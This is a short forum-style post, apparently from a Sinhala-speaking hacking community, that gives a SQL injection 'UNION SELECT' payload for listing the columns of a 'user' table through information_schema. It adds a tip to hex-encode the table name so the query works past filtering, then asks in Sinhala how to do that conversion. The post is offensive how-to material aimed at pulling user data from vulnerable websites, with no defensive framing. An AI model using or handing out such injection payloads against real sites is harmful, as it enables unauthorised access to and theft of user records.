UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
it extracts the column names belongs to the table "user" from database "information_schema"
but you have to convert 'user' to hex to statement to work..
ethakota wada user to hex kiwe mokkda?